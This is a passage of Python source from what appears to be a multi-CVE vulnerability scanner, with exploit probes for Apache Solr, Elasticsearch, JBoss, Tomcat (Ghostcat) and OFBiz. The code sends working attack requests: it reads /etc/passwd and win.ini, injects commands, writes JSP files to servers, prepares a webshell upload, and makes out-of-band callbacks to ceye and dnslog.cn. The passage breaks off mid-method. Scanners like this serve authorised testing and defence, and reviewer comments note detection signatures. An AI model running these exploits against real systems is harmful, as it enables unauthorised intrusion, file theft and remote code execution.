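    print call cannot leave it held.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Apache Solr: time-2021-03-18"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = ""
    self.vul_info["vul_name"] = "Apache Solr Arbitrary file reading"
    self.vul_info["vul_numb"] = "time-2021-03-18"
    self.vul_info["vul_apps"] = "Solr"
    self.vul_info["vul_date"] = "2021-03-17"
    self.vul_info["vul_vers"] = "all"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "Arbitrary file read"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "Arbitrary file read"
    self.vul_info["cre_auth"] = "zhzyker"
    core_name = None
    url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
    # Same multipart boundary on both requests; built once.
    boundary = '--------------------------e602c3e1a193d599'
    try:
        request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False)
        try:
            core_name = list(json.loads(request.text)["status"])[0]
        except Exception:
            # No parsable core list: the probe continues against "/solr/None/" and
            # simply finds nothing, matching the original best-effort behaviour.
            pass
        set_property = self.url + "/solr/" + str(core_name) + "/config"
        headers_json = {
            'Content-Type': 'application/json',
            'Connection': 'close',
            'User-Agent': self.ua
        }
        # Turning on enableRemoteStreaming is the precondition for stream.url
        # file reads; a config change like this is worth auditing on real cores.
        data = r'''{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}'''
        r = requests.post(set_property, data=data, headers=headers_json, timeout=self.timeout, verify=False)
        if r.status_code == 200 and r"responseHeader" in r.text:
            rce_url = self.url + "/solr/" + str(core_name) + "/debug/dump?param=ContentStreams"
            headers = {
                'User-Agent': self.ua,
                'Connection': 'close',
                'Content-Type': 'multipart/form-data; boundary=------------------------e602c3e1a193d599'
            }
            data = boundary + '\r\n'
            data += 'Content-Disposition: form-data; name="stream.url"\r\n'
            data += '\r\n'
            data += 'file:///etc/passwd\r\n'
            data += boundary + '--\r\n'
            req = requests.post(rce_url, data=data, headers=headers, timeout=self.timeout, verify=False)
            if r"root:x:0:0:root" in req.text and r"/root:/bin/bash" in req.text and r"/usr/sbin/nologin" in req.text:
                if r"daemon:" in req.text and req.status_code == 200:
                    self.vul_info["vul_data"] = dump.dump_all(req).decode('utf-8', 'ignore')
                    self.vul_info["prt_resu"] = "PoCSuCCeSS"
                    self.vul_info["prt_info"] = "[file read] [os:linux] [corename: " + self.url + "/solr/" + core_name + " ]"
            else:
                data = boundary + '\r\n'
                data += 'Content-Disposition: form-data; name="stream.url"\r\n'
                data += '\r\n'
                data += 'file:///C:windows/win.ini\r\n'
                data += boundary + '--\r\n'
                req = requests.post(rce_url, data=data, headers=headers, timeout=self.timeout, verify=False)
                if r"app support" in req.text and r"fonts" in req.text and r"mci extensions" in req.text:
                    if r"files" in req.text and req.status_code == 200:
                        self.vul_info["vul_data"] = dump.dump_all(req).decode('utf-8', 'ignore')
                        self.vul_info["prt_resu"] = "PoCSuCCeSS"
                        self.vul_info["prt_info"] = "[file read] [os:windows] [corename: " + self.url + "/solr/" + core_name + " ]"
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception:
        verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()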
def cve_2019_0193_poc(self):
    """Apache Solr CVE-2019-0193 (DataImportHandler) probe.

    Looks up the first core, touches its mbeans endpoint, then POSTs the
    dataimport payload.  A 200 on that POST is reported as PoC_MaYbE only — the
    command output is never checked, so this is a reachability test, not proof.
    Result is printed via verify.scan_print either way.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Apache Solr: CVE-2019-0193"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = self.payload_cve_2019_0193.replace("RECOMMAND", "whoami")
    self.vul_info["vul_name"] = "Apache Solr 搜索引擎中的命令执行漏洞"
    self.vul_info["vul_numb"] = "CVE-2019-0193"
    self.vul_info["vul_apps"] = "Solr"
    self.vul_info["vul_date"] = "2019-10-16"
    self.vul_info["vul_vers"] = "< 8.2.0"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "Remote Code Execution"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患," \
                                "在apache solr < 8.2.0版本之前DIH配置中dataconfig可以被用户控制"
    self.vul_info["cre_auth"] = "zhzyker"
    # Sentinel string rather than None; compared against below.
    core_name = "null"
    md = random_md5()
    cmd = "echo " + md
    payload = self.payload_cve_2019_0193.replace("RECOMMAND", quote(cmd, 'utf-8'))
    solrhost = self.hostname + ":" + str(self.port)
    headers = {
        'Host': "" + solrhost,
        'User-Agent': self.ua,
        'Accept': "application/json, text/plain, */*",
        'Accept-Language': "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        'Accept-Encoding': "zip, deflate",
        'Referer': self.url + "/solr/",
        'Content-type': "application/x-www-form-urlencoded",
        'X-Requested-With': "XMLHttpRequest",
        'Connection': "close"
    }
    urlcore = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
    try:
        request = requests.get(urlcore, headers=headers, timeout=self.timeout, verify=False)
        try:
            core_name = list(json.loads(request.text)["status"])[0]
        except:
            pass
        # Response of the mbeans request is discarded; it only warms the core.
        urlconfig = self.url + "/solr/" + str(core_name) + "/admin/mbeans?cat=QUERY&wt=json"
        request = requests.get(urlconfig, headers=headers, timeout=self.timeout, verify=False)
        url_cmd = self.url + "/solr/" + str(core_name) + "/dataimport"
        request = requests.post(url_cmd, data=payload, headers=headers, timeout=self.timeout, verify=False)
        # `md` is never searched for in the response, hence "maybe".
        if request.status_code == 200 and core_name != "null":
            self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoC_MaYbE"
            self.vul_info["prt_info"] = "[maybe] [core name:" + url_cmd + "] "
            verify.scan_print(self.vul_info)
        else:
            verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception:
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
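def cve_2015_1427_poc(self):
    """Elasticsearch CVE-2015-1427 (Groovy sandbox bypass) probe.

    Indexes a throwaway document so a search can run, then sends the scripted
    search payload with an `echo <random>` command and checks whether the random
    marker comes back in `hits[0].fields.lupin[0]`.  Result is printed via
    verify.scan_print.

    Changes from the original: vul_apps is corrected from "Fastjson" to
    "Elasticsearch" (copy-paste error), the bare `except` around the JSON path
    lookup is narrowed to `Exception`, and the thread lock is released in a
    `finally`.  Instance attributes (`self.request`, `self.req`, `self.r`, ...)
    are still set because other code may read them.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Elasticsearch: CVE-2015-1427"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = self.payload_cve_2015_1427.replace("RECOMMAND", "whoami")
    self.vul_info["vul_name"] = "Elasticsearch 命令执行漏洞"
    self.vul_info["vul_numb"] = "CVE-2015-1427"
    self.vul_info["vul_apps"] = "Elasticsearch"
    self.vul_info["vul_date"] = "2015-01-31"
    self.vul_info["vul_vers"] = "< 1.3.7, < 1.4.3"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "命令执行漏洞"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "Elasticsearch 1.3.8之前的Groovy脚本引擎和1.4.3之前的1.4.x中的Groovy脚本引擎允许远程攻击" \
                                "者绕过沙盒保护机制,并通过精心制作的脚本执行任意shell命令。"
    self.vul_info["cre_date"] = "2021-01-21"
    self.vul_info["cre_auth"] = "zhzyker"
    self.data_send_info = r'''{ "name": "cve-2015-1427" }'''
    md = random_md5()
    cmd = "echo " + md
    self.data_rce = self.payload_cve_2015_1427.replace("RECOMMAND", cmd)
    self.host = self.hostname + ":" + str(self.port)
    self.headers_text = {
        'Host': "" + self.host,
        'Accept': '*/*',
        'Connection': 'close',
        'Accept-Language': 'en',
        'User-Agent': self.ua,
        'Content-Type': 'application/text'
    }
    try:
        # A search needs at least one indexed document; this seeds one.
        self.request = requests.post(self.url + "/website/blog/", data=self.data_send_info, headers=self.headers, timeout=self.timeout, verify=False)
        self.req = requests.post(self.url + "/_search?pretty", data=self.data_rce, headers=self.headers_text, timeout=self.timeout, verify=False)
        try:
            self.r = list(json.loads(self.req.text)["hits"]["hits"])[0]["fields"]["lupin"][0]
        except Exception:
            # Any shape mismatch (no hits, no "lupin" field, non-JSON body) means no finding.
            self.r = "null"
        if md in self.r:
            self.vul_info["vul_data"] = dump.dump_all(self.req).decode('utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["prt_info"] = "[rce] [cmd: " + cmd + "] "
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception:
        verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()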
def cve_2017_12629_poc(self):
    """Apache Solr CVE-2017-12629 (RunExecutableListener) probe.

    Registers a listener on the first core whose command pings
    `<random>.<ceye_domain>`.  With a placeholder ceye domain (contains
    "xxxxxx") the probe can only report PoC_MaYbE from the HTTP status; with a
    real one it triggers the listener via /update and polls the ceye API for the
    random marker.  Result is printed via verify.scan_print.
    """
    self.threadLock.acquire()
    # NOTE(review): process-global mutation of http.client — it is never restored,
    # affects every other request in this process, and races with
    # cve_2010_0738_poc, which sets it back to 'HTTP/1.1' under the same lock
    # only while that method runs.
    http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
    self.vul_info["prt_name"] = "Apache Solr: CVE-2017-12629"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_payd"] = self.payload_cve_2017_12629.replace("RECOMMAND", "whoami")
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_name"] = "Apache Solr 远程代码执行漏洞"
    self.vul_info["vul_numb"] = "CVE-2017-12629"
    self.vul_info["vul_apps"] = "Solr"
    self.vul_info["vul_date"] = "2017-10-14"
    self.vul_info["vul_vers"] = "< 7.1.0"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "Remote Code Execution"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法" \
                                "(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。"
    self.vul_info["cre_auth"] = "zhzyker"
    core_name = "null"
    # The listener is registered under a random name; that name is what a
    # defender would find left behind in the core's config overlay.
    new_core = random_md5()
    md = random_md5()
    cmd = "ping " + md + "." + self.ceye_domain
    payload1 = self.payload_cve_2017_12629.replace("RECOMMAND", cmd).replace("new_core", new_core)
    payload2 = '[{"id": "test"}]'
    url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json"
    headers_solr1 = {
        'Accept': "*/*",
        'User-Agent': self.ua,
        'Content-Type': "application/json"
    }
    headers_solr2 = {
        'Host': "localhost",
        'Accept-Language': "en",
        'User-Agent': self.ua,
        'Connection': "close",
        'Content-Type': "application/json"
    }
    try:
        request = requests.get(url_core, headers=headers_solr1, timeout=self.timeout, verify=False)
        try:
            core_name = list(json.loads(request.text)["status"])[0]
        except:
            pass
        req = requests.post(self.url + "/solr/" + str(core_name) + "/config", data=payload1, headers=headers_solr1, timeout=self.timeout, verify=False)
        if r"xxxxxx" in self.ceye_domain:  # signature check: no ceye account configured
            # Note `request` (the core listing) is what is status-checked here, not `req`.
            if request.status_code == 200 and core_name != "null" and core_name is not None:
                self.vul_info["vul_data"] = dump.dump_all(req).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoC_MaYbE"
                self.vul_info["prt_info"] = "[maybe] [new core:" + new_core + "] "
            verify.scan_print(self.vul_info)
        else:
            request = requests.post(self.url + "/solr/" + str(core_name) + "/update", data=payload2, headers=headers_solr2, timeout=self.timeout, verify=False)
            # No timeout/verify on the ceye poll, unlike every other request here.
            request = requests.get(self.ceye_api + self.ceye_token)
            if md in request.text:
                self.vul_info["vul_data"] = dump.dump_all(req).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["prt_info"] = "[ceye] [new core:" + new_core + "] "
                verify.scan_print(self.vul_info)
            else:
                verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception:
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
def cve_2010_0738_poc(self):
    """JBoss CVE-2010-0738 (JMX console HEAD-method auth bypass) probe.

    Issues the DeploymentFileRepository `store` invocation as a HEAD request
    (twice, with a short pause) and then fetches /shells/shells.jsp to see
    whether the random marker was written.  Result is printed via
    verify.scan_print.
    NOTE(review): this method overwrites `self.headers`, which other probes in
    this class pass to requests — a side effect on shared instance state.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "RedHat JBoss: CVE-2010-0738"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "JBoss JMX控制台安全验证绕过漏洞"
    self.vul_info["vul_numb"] = "CVE-2010-0738"
    self.vul_info["vul_apps"] = "JBoss"
    self.vul_info["vul_date"] = "2014-03-21"
    self.vul_info["vul_vers"] = "4.2.0 - 4.3.0"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "任意文件上传"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "CVE-2010-0738漏洞利用了HTTP中HEAD请求方法,绕过了对GET和POST请求的限制," \
                                "成功地再次利用jboss.admin -> DeploymentFileRepository -> store()方法上传文件。"
    self.vul_info["cre_date"] = "2021-01-28"
    self.vul_info["cre_auth"] = "zhzyker"
    # Process-global http.client setting; see cve_2017_12629_poc which sets 'HTTP/1.0'.
    http.client.HTTPConnection._http_vsn_str = 'HTTP/1.1'
    self.path = "/jmx-console/HtmlAdaptor"
    md = random_md5()
    self.data = md
    # The probe writes a harmless marker file; `self.exp` (built from self.name /
    # self.jsp_webshell, defined elsewhere) is prepared but not sent here.
    self.poc = (
        "?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName="
        "store&argType=java.lang.String&arg0=shells.war&argType=java.lang.String&arg1=shells&argType=java"
        ".lang.String&arg2=.jsp&argType=java.lang.String&arg3=" + self.data + "&argType=boolean&arg4=True")
    self.exp = (
        "?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName="
        "store&argType=java.lang.String&arg0=" + self.name + ".war&argType=java.lang.String&arg1=" + self.name + "&argType=java"
        ".lang.String&arg2=.jsp&argType=java.lang.String&arg3=" + self.jsp_webshell + "&argType=boolean&arg4=True")
    self.headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        'User-Agent': self.ua,
        "Connection": "keep-alive"
    }
    try:
        # HEAD to the JMX console with a `store` invocation is the telltale
        # request for this bypass; the deployed /shells/shells.jsp is the artifact.
        self.req = requests.head(self.url + self.path + self.poc, headers=self.headers, timeout=self.timeout, verify=False)
        self.request = requests.get(self.url + "/shells/shells.jsp", headers=self.headers, timeout=self.timeout, verify=False)
        self.req = requests.head(self.url + self.path + self.poc, headers=self.headers, timeout=self.timeout, verify=False)
        # Deployment is asynchronous on the server side; the pause gives it time.
        time.sleep(0.5)
        self.request = requests.get(self.url + "/shells/shells.jsp", headers=self.headers, timeout=self.timeout, verify=False)
        if md in misinformation(self.request.text, md) and self.request.status_code == 200:
            self.vul_info["vul_data"] = dump.dump_all(self.req).decode('utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["vul_payd"] = self.poc
            self.vul_info["prt_info"] = "[jmx-console] [upload: " + self.url + "/shells/shells.jsp ]"
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
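def cve_2020_1938_exp(self, file):
    """Apache Tomcat CVE-2020-1938 (Ghostcat) file read over AJP.

    Opens a raw TCP connection to the AJP port, sends a forward request whose
    `javax.servlet.include.*` attributes point at `file`, and prints the body
    chunks returned by the connector via verify.exploit_print.

    Args:
        file: path (relative to the web application root) to request.

    Changes from the original: vul_name said "Apache Shiro: CVE-2016-4437" and
    the banner said "cve-2020-2019"; both now name CVE-2020-1938.  The timeout
    is set on the socket instead of process-wide via socket.setdefaulttimeout.
    The (currently dead) Basic-auth branch used the Python-2-only
    str.encode('base64') and a one-argument str.replace, which would raise on
    Python 3; it now uses base64.b64encode.  The socket is closed in a
    `finally` instead of being leaked.
    """
    vul_name = "Apache Tomcat: CVE-2020-1938"
    headers = self.headers
    self.output_method = "ajp"
    self.default_port = self.port
    self.default_requri = '/'
    self.default_headers = {}
    self.username = None
    self.password = None
    self.getipport = urlparse(self.url)
    self.hostname = self.getipport.hostname
    self.request = "null"
    raw_data = ">_< Tomcat cve-2020-1938 vulnerability uses AJP protocol detection\n" \
               ">_< So there is no HTTP protocol request and response"
    sock = None
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Per-socket timeout rather than socket.setdefaulttimeout, which would
        # silently change every other socket created in this process.
        sock.settimeout(self.timeout)
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.connect((self.hostname, self.default_port))
        self.socket = sock
        self.stream = self.socket.makefile("rb", buffering=0)  # PY2: bufsize=0
        # The include.* request attributes are the AJP-level signature of this
        # CVE; an AJP connector exposed beyond localhost is the root exposure.
        self.attributes = [
            {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
            {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', file]},
            {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
        ]
        method = 'GET'
        self.forward_request = ApacheTomcat.__prepare_ajp_forward_request(
            self, self.hostname, self.default_requri,
            method=AjpForwardRequest.REQUEST_METHODS.get(method))
        # Dead today (username/password are forced to None above) but kept for
        # callers that may set credentials before the request is built.
        if self.username is not None and self.password is not None:
            creds = "%s:%s" % (self.username, self.password)
            self.forward_request.request_headers['SC_REQ_AUTHORIZATION'] = "Basic " + base64.b64encode(creds.encode()).decode()
        for h in self.default_headers:
            self.forward_request.request_headers[h] = headers[h]
        for a in self.attributes:
            self.forward_request.attributes.append(a)
        self.responses = self.forward_request.send_and_receive(self.socket, self.stream)
        if len(self.responses) == 0:
            # Preserved from the original: the only path that returns a value.
            return None, None
        self.snd_hdrs_res = self.responses[0]
        # First packet is SEND_HEADERS, last is END_RESPONSE; the middle ones carry the body.
        self.data_res = self.responses[1:-1]
        self.request = (b"".join([d.data for d in self.data_res]).decode())
        verify.exploit_print(self.request, raw_data)
    except socket.timeout:
        verify.timeout_print(vul_name)
    except Exception:
        verify.error_print(vul_name)
    finally:
        if sock is not None:
            sock.close()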
def cve_2010_1428_poc(self):
    """JBoss CVE-2010-1428 (web-console Invoker auth bypass) probe.

    Sends the serialized payload to /web-console/Invoker as a HEAD request
    (twice, with a pause), then calls /jexws4/jexws4.jsp?ppp=echo <random> and
    looks for the random marker in the reply.  Result is printed via
    verify.scan_print.
    NOTE(review): `bad` is computed but never used; `self.req` (the HEAD
    response) is what gets dumped on success, not the GET that proved it.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "RedHat JBoss: CVE-2010-1428"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "JBoss WEB 控制台安全验证绕过漏洞"
    self.vul_info["vul_numb"] = "CVE-2010-1428"
    self.vul_info["vul_apps"] = "JBoss"
    self.vul_info["vul_date"] = "2010-04-19"
    self.vul_info["vul_vers"] = "4.2.0 - 4.3.0"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "任意文件上传"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "JBoss企业应用平台中存在多个非授权访问漏洞,远程用户可以绕过认证执行非授权操作或读取敏感信息。"
    self.vul_info["cre_date"] = "2021-01-28"
    self.vul_info["cre_auth"] = "zhzyker"
    self.path = "/web-console/Invoker"
    md = random_md5()
    cmd = "echo " + md
    # self.data = ":-)"
    bad = "20" + md
    try:
        # A HEAD request carrying a body to /web-console/Invoker is the on-wire
        # anomaly a reverse proxy or IDS can flag for this bypass.
        self.req = requests.head(self.url + self.path, data=self.payload_cve_2010_1428, headers=self.headers, timeout=self.timeout, verify=False)
        time.sleep(0.5)
        self.cmd = urlencode({"ppp": cmd})
        self.request = requests.get(self.url + "/jexws4/jexws4.jsp?" + self.cmd, headers=self.headers, timeout=self.timeout, verify=False)
        self.req = requests.head(self.url + self.path, data=self.payload_cve_2010_1428, headers=self.headers, timeout=self.timeout, verify=False)
        self.cmd = urlencode({"ppp": cmd})
        self.request = requests.get(self.url + "/jexws4/jexws4.jsp?" + self.cmd, headers=self.headers, timeout=self.timeout, verify=False)
        if md in misinformation(self.request.text, md):
            self.vul_info["vul_data"] = dump.dump_all(self.req).decode('utf-8', 'ignore')
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["vul_payd"] = self.url + self.path
            self.vul_info["prt_info"] = "[web-console] [upload: " + self.url + "/jexws4/jexws4.jsp?ppp=whoami ]"
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception as e:
        verify.error_print(self.vul_info["prt_name"])
    self.threadLock.release()
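def cve_2021_26295_poc(self):
    """Apache OFBiz CVE-2021-26295 (RMI deserialization) probe.

    Obtains a callback domain from dnslog.cn, hex-encodes it into the SOAP
    payload, POSTs it to /webtools/control/SOAPService and then polls dnslog.cn
    for a lookup of that domain.  Result is printed via verify.scan_print.

    Changes from the original: vul_apps is corrected from "Flink" to "OFBiz"
    (copy-paste error) and the thread lock is released in a `finally`.
    NOTE(review): the dnslog.cn session is a hard-coded PHPSESSID shared by
    every copy of this tool, so results from concurrent users are
    indistinguishable — a per-run session would be needed for reliability.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "Apache OFBiz: CVE-2021-26295"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "Apache OFBiz RMI deserializes arbitrary code execution"
    self.vul_info["vul_numb"] = "CVE-2021-26295"
    self.vul_info["vul_apps"] = "OFBiz"
    self.vul_info["vul_date"] = "2021-03-25"
    self.vul_info["vul_vers"] = "< 17.12.06"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "Arbitrary Code Execution"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "Apache OFBiz官方发布安全更新,修复了一处由RMI反序列化造成的远程代码执行漏洞。" \
                                "攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器."
    self.vul_info["cre_date"] = "2021-03-31"
    self.vul_info["cre_auth"] = "zhzyker"
    headers = {
        'User-Agent': self.ua,
        'Content-Type': 'text/xml',
        'Connection': 'close'
    }

    def _trans(s):
        # bytes -> lowercase hex string, as the payload template expects.
        return "%s" % ''.join('%.2x' % x for x in s)

    def dnslog_re(md):
        # Returns `md` when dnslog.cn has a record containing it, else None.
        headers_dnslog = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3970.5 Safari/537.36',
            'Host': 'www.dnslog.cn',
            'Cookie': 'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548',
            'Accept': '*/*',
            'Referer': 'http://www.dnslog.cn/',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'Connection': 'close'
        }
        dnslog_url = "http://www.dnslog.cn/getrecords.php?t=0.913020034617231"
        dns = requests.get(dnslog_url, headers=headers_dnslog, timeout=10, verify=False)
        if md in dns.text:
            return md

    try:
        headers_dnslog = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
            'Host': 'www.dnslog.cn',
            'Cookie': 'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548',
            'Accept': '*/*',
            'Referer': 'http://www.dnslog.cn/',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'Connection': 'close'
        }
        dnslog_api = "http://www.dnslog.cn/getdomain.php?t=0.08025501698741366"
        dns = requests.post(dnslog_api, headers=headers_dnslog, timeout=10, verify=False)
        dns = dns.text
        dns_data = bytes(dns, encoding="utf8")
        dns_hex = _trans(dns_data)
        data = self.payload_cve_2021_26295_poc.replace("RECOMMAND", dns_hex)
        url = urljoin(self.url, "/webtools/control/SOAPService")
        request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False)
        # Out-of-band check: the target resolving the callback name is the only evidence used.
        if dnslog_re(dns):
            self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore')
            self.vul_info["vul_payd"] = data
            self.vul_info["prt_resu"] = "PoCSuCCeSS"
            self.vul_info["prt_info"] = "[dns] [rmi:" + dns + "]"
        verify.scan_print(self.vul_info)
    except requests.exceptions.Timeout:
        verify.timeout_print(self.vul_info["prt_name"])
    except requests.exceptions.ConnectionError:
        verify.connection_print(self.vul_info["prt_name"])
    except Exception:
        verify.error_print(self.vul_info["prt_name"])
    finally:
        self.threadLock.release()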
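def cve_2015_7501_poc(self):
    """JBoss CVE-2015-7501 (JMXInvokerServlet deserialization) probe.

    POSTs the serialized payload to /invoker/JMXInvokerServlet (twice, with a
    pause), then calls /jexinv4/jexinv4.jsp?ppp=echo <random> and looks for the
    random marker in the reply.  Result is printed via verify.scan_print.

    Changes from the original: prt_info pointed at /jexws4/jexws4.jsp (the
    CVE-2010-1428 artifact) although this probe checks /jexinv4/jexinv4.jsp —
    corrected; the unused `bad` local is removed; the thread lock is released
    in a `finally`.
    """
    self.threadLock.acquire()
    self.vul_info["prt_name"] = "RedHat JBoss: CVE-2015-7501"
    self.vul_info["prt_resu"] = "null"
    self.vul_info["prt_info"] = "null"
    self.vul_info["vul_urls"] = self.url
    self.vul_info["vul_payd"] = "null"
    self.vul_info["vul_name"] = "JBoss 反序列化远程命令执行漏洞"
    self.vul_info["vul_numb"] = "CVE-2015-7501"
    self.vul_info["vul_apps"] = "JBoss"
    self.vul_info["vul_date"] = "2015-11-15"
    self.vul_info["vul_vers"] = "5.x, 6.x"
    self.vul_info["vul_risk"] = "high"
    self.vul_info["vul_type"] = "远程命令执行"
    self.vul_info["vul_data"] = "null"
    self.vul_info["vul_desc"] = "此漏洞主要是由于JBoss中invoker/JMXInvokerServlet路径对外开放,由于JBoss的jmx组件支" \
                                "持Java反序列化,并且在反序列化过程中没有加入有效的安全检测机制," \
                                "导致攻击者可以传入精心构造好的恶意序列化数据,在jmx对其进行反序列化处理时," \
                                "导致传入的携带恶意代码的序列化数据执行,造成反序列化漏洞"
    self.vul_info["cre_date"] = "2021-01-28"
    self.vul_info["cre_auth"] = "zhzyker"
    self.path = "/invoker/JMXInvokerServlet"
    self.data = ":-)"
    md = random_md5()
    cmd = "echo " + md
    probe_url = self.url + "/jexinv4/jexinv4.jsp?"
    try:
        # A serialized-Java body POSTed to /invoker/JMXInvokerServlet is the
        # request shape to alert on; the deployed jexinv4.jsp is the artifact.
        self.request = requests.post(self.url + self.path, data=self.payload_cve_2015_7501, headers=self.headers, timeout=self.timeout, verify=False)
        # Deployment is asynchronous on the server side; the pause gives it time.
        time.sleep(0.5)
        self.cmd = urlencode({"ppp": cmd})
        self.request = requests.get(probe_url + self.cmd, headers=self.headers, timeout=self.timeout, verify=False)
        self.req = requests.post(self.url + self.path, data=self.payload_cve_2015_7501, headers=self.headers, timeout=self.timeout, verify=False)
        self.cmd = urlencode({"ppp": cmd})
        self.request = requests.get(probe_url + self.cmd, headers=self.headers, timeout=self.timeout, verify=False)
        if md in self.request.text:
            # misinformation() filters echoes of the marker that merely reflect the query string.
            if md in misinformation(self.request.text, md):
                self.vul_info["vul_data"] = dump.dump_all(self.req).decode('utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_payd"] = self.url + self.path
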